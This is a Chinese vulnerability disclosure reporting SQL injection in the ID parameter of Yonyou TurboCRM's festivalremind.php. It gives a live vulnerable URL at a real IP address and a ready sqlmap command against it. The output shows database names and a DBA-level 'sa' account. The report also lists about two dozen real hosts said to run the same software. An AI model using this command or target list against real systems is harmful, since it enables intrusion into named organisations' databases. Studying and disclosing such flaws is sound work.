用友某通用系统存在SQL注入

### 简要描述： 用友某通用系统存在SQL注入 ### 详细说明： 用友TurboCRM存在通用sql注入。 [<img src="https://images.seebug.org/upload/201406/27100749e814f98404a5ac54d0d19594028728d8.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/27100749e814f98404a5ac54d0d19594028728d8.jpg) 存在注入的文件路径： ``` code\www\background\festivalremind.php ``` festivalremind.php文件中ID参数未做过滤 漏洞URL： ``` http://220.178.27.116:8001//background/festivalremind.php?ID=99999 ``` festivalremind.php文件中ID参数未做过滤存在mssql timebased盲注。 ``` sqlmap.py -u "http://220.178.27.116:8001//background/festivalremind.php?ID=99999" --dbs --current-user --current-db --is-dba ``` ``` [*] master [*] model [*] msdb [*] tempdb [*] turbocrm70 [*] UFDATA_001_2011 [*] UFMeta_002_2011 ...略... ``` ``` current user: 'sa' current database: 'turbocrm70' current user is DBA: True ``` 整理出了以下使用这套crm的网站，title:用友TurboCRM ``` 182.135.191.86 111.40.0.242:9091 222.171.32.36:9091 219.90.119.35:8081 180.168.98.94:8088 prm.yonyou.com www.kdlian.com:8001 prm.chanjet.com qinyuancrm.com kfdq369.gicp.net 220.113.5.194 218.84.134.162:8088 turbocrm.yofc.com crm.elfa.com.cn crm.pearmain.cn nc.shineroad.com crm.westernpower.cn crm7.abgroup.cn crm.transn.net zh4433.vicp.net 218.108.86.226 crm.yiwenkeji.com:8080 218.95.66.88:9036 crm.digisystem.com.cn:8080 crm.shineroad.com crm.siweidg.com 222.41.174.190:8088 ``` ### 漏洞证明： 存在注入的文件路径： ``` code\www\background\festivalremind.php ``` festivalremind.php文件中ID参数未做过滤 漏洞URL： ``` http://220.178.27.116:8001//background/festivalremind.php?ID=1 ``` festivalremind.php文件中ID参数未做过滤存在mssql timebased盲注。 ``` sqlmap.py -u "http://220.178.27.116:8001//background/festivalremind.php?ID=1" --dbs --current-user --current-db --is-dba ``` ``` [*] master [*] model [*] msdb [*] tempdb [*] turbocrm70 [*] UFDATA_001_2011 [*] UFMeta_002_2011 ...略... ``` ``` current user: 'sa' current database: 'turbocrm70' current user is DBA: True ```